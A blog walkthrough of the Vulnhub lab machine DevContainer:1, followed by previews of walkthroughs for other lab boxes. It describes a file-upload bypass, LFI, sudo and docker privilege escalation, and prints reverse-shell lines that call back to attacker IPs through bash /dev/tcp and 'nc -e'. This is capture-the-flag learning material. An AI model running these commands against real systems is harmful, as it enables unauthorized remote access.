DevContainer:1 - Walkthrough [Vulnhub]

Here's my solution for DevContainer:1
The machine can be downloaded from here.

Nmap
Scanning for all TCP ports.
$ nmap -sC -sV -p- 192.168.1.104


We see only 1 port open.

Enumeration
Browsing the web and checking the source neither reveal any useful information nor hints.

 


We run dirb to scan the directories.
$ dirb http://192.168.1.104


Browsing /upload


Here we upload the php reverse shell file with double extension- shell.php.jpg and intercept the request using intercepting proxy tool.


After intercepting the request we change the extension from- shell.php.jpg > shell.php and forward the request.



Seems that the payload/file is uploaded successfully.

Getting Access
Now to run the payload/file, first we need to find the location of it.
We hover the mouse over the broken image icon and look at the status bar to know the location of the file or we can simply right click on the broken image icon and click- Copy Image Location.

Let us browse the location and on the other hand we start the netcat listener.


We successfully get the reverse shell.

Privilege Escaltion
From www-data>richard
There's some interesting files under the directory- /var/www/html/Maintenance-Web-Docker

We have full permission on file- list.sh
Viewing the contents in file- list.sh, seems to write in the file- out.txt
And observing the contents in file- out.txt, we can see that the file- list.sh is running every one minute.



Since we have full permission on file- list.sh, we place the bash reverse shell payload in it
$ echo 'bash -i >& /dev/tcp/192.168.1.105/8080 0>&1' >> list.sh
And on the other hand we start the netcat listener and wait for a minute.



We get the reverse shell.

User Flag.



From richard>root
We check for sudo rights.
$ sudo -l


Seems interesting, we run it with user- root.

We executed the command and now we browse- http://192.168.1.104:8080



We click on- ABOUT US, and observe the URL has a parameter- view=

After playing with the parameter, we find that it is vulnerable to LFI.



We move back to the shell, and navigate to /web/upload/files and copy the previously uploaded php reverse shell file- shell.php within same directory with a new name- rshell.php or we can also upload a new reverse shell file.

We change the listening port number in the new reverse shell file and save it.

To note here is the location/path of the new reverse shell file that is-
/home/richard/web/upload/files/rshell.php

Now again we run the command as user- root.



Moving back to browser, we browse the location of our new reverse shell file and on the other hand we start the netcat listener.


We successfully get the reverse shell.

Root Flag


Comments

Post a Comment

Popular posts from this blog

Sunset:Noontide - Walkthrough [Vulnhub]

Image
Here's my solution for Sunset:Noontide. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.109 We find 3 ports (UnrealIRCd) open. Enumeration We search the exploit for UnrealIRCd and we find it here.     Getting Access To exploit we simply run the nmap command with the reverse shell payload and on the other hand we start the netcat listener. $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -e /bin/sh 192.168.1.108 1234' 192.168.1.109 We get the reverse shell. User Flag. Privilege Escalation We find that user- root has the default password- root. Lets switch to user- root and get the root flag. $ su root Password: root  
Read more

CyberSploit:2 - Walkthrough [Vulnhub]

Image
Here's my solution for CyberSploit:2. The Machine can be downloaded from here Nmap Starting with nmap scanning for all TCP open ports. nmap -sC -sV -p- 192.168.1.103 We find only 2 open ports. Enumeration Browsing the website, show list of usernames and passwords. Checking the source code reveal us a hint- ROT47. While browsing the website, we see a strange username- D92:=6?5C2 and its associated password as- 4J36CDA=@:E` From the hint we can guess that the username and password can be ROT47 encoded. Browsed Decode.fr to decode it, and we get the credentials as- username: shailendra password: cybersploit1 Getting Access Tried ssh with credential, and we get the access. ssh shailendra@192.168.1.1 password: cybersploit1 Found a file named as hint.txt, which gives a hint as docker, it can be used for privilege escalation, also the user is a member of docker group. Privilege Escalation docker run -v /:/mnt --rm -it alpine chroot /mnt sh And we get the flag
Read more

BBS(cute):1.0.1 - Walkthrough [Vulnhub]

Image
Here's my solution for BBS(cute):1.0.1. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.111 We find 5 ports open. Enumeration Browsing the web hosted on port 80 (Default HTTP Port). We do not find any useful information lets run the dirb for scanning directories. $ dirb http://192.168.1.111 -r Browsing /index.php We see that it is built on CMS- CuteNews and its version 2.1.2 We search for the exploit and found it here.   Lets get this exploit. Getting Access But before running the exploit we need to make some changes. We remove all /CuteNews from the exploit code, in order to run it successfully. Done with the changes, now we run the exploit. $ python3 48800.py We provide the required information that is, the URL and hit enter. The commands are running fine, but we are not able to navigate to different directories, hence we try to get the normal reverse shell. We see netcat is present, we enter the payload. $ nc -e /bin/bash 19...
Read more